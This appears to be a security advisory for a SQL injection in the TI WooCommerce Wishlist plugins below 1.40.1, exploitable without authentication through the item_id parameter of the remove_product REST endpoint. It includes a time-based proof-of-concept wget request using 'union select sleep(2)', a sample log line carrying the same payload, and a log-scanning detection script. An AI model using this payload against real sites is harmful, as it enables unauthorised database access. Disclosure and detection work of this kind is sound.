The plugins do not sanitise and escape the item_id parameter before using it in a SQL statement via the wishlist/remove_product REST endpoint, allowing unauthenticated attackers to perform SQL injection attacks.
`time wget 'https://example.com/?rest_route=/wc/v3/wishlist/remove_product/1&item_id=0 union select sleep(2) -- g'`

Even though the request produces an HTTP 400 error, the payload is still processed and the response is delayed.
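As an added example (not part of this advisory), the script below scans web-server access-log lines for requests to the remove_product endpoint whose item_id is not a plain integer, the condition a defender can alert on regardless of the response code. The log lines are constructed, and the /wp-json/ path form is assumed as an alternative to ?rest_route=.

```python
import re
from urllib.parse import urlsplit, parse_qs

# Constructed sample access-log lines (combined log format); not taken from the advisory.
SAMPLE_LOG = """\
203.0.113.5 - - [10/May/2024:12:00:01 +0000] "GET /?rest_route=/wc/v3/wishlist/remove_product/1&item_id=42 HTTP/1.1" 200 73 "-" "Mozilla/5.0"
203.0.113.9 - - [10/May/2024:12:00:03 +0000] "GET /?rest_route=/wc/v3/wishlist/remove_product/1&item_id=0%20union%20select%20sleep(2)%20--%20g HTTP/1.1" 400 90 "-" "curl/8.0"
203.0.113.9 - - [10/May/2024:12:00:05 +0000] "GET /wp-json/wc/v3/wishlist/remove_product/1?item_id=7 HTTP/1.1" 200 73 "-" "curl/8.0"
198.51.100.2 - - [10/May/2024:12:00:07 +0000] "GET /?rest_route=/wc/v3/wishlist/get_by_user/1 HTTP/1.1" 200 512 "-" "Mozilla/5.0"
"""

LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>\S+) (?P<target>\S+) [^"]*" (?P<status>\d{3})'
)
ENDPOINT = "/wc/v3/wishlist/remove_product/"


def is_wishlist_remove(target):
    """True if the request targets remove_product via ?rest_route= or the assumed /wp-json/ path."""
    parts = urlsplit(target)
    route = parse_qs(parts.query).get("rest_route", [""])[0]
    return ENDPOINT in route or ENDPOINT in parts.path


def suspicious_item_ids(log_text):
    """Return (ip, status, item_id) for remove_product requests whose item_id is not all digits.

    The status code is reported but deliberately not used as a filter: the advisory notes
    the injected query still runs when the endpoint answers 400.
    """
    hits = []
    for line in log_text.splitlines():
        m = LOG_RE.match(line)
        if not m or not is_wishlist_remove(m["target"]):
            continue
        # parse_qs percent-decodes, so the injected SQL is inspected in its decoded form.
        values = parse_qs(urlsplit(m["target"]).query).get("item_id")
        if values is None:
            continue
        if not re.fullmatch(r"\d+", values[0]):
            hits.append((m["ip"], int(m["status"]), values[0]))
    return hits


if __name__ == "__main__":
    for ip, status, item_id in suspicious_item_ids(SAMPLE_LOG):
        print(f"{ip} status={status} item_id={item_id!r}")
```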
CPE name | Operator | Version
---|---|---
ti-woocommerce-wishlist | lt | 1.40.1
ti-woocommerce-wishlist-premium | lt | 1.40.1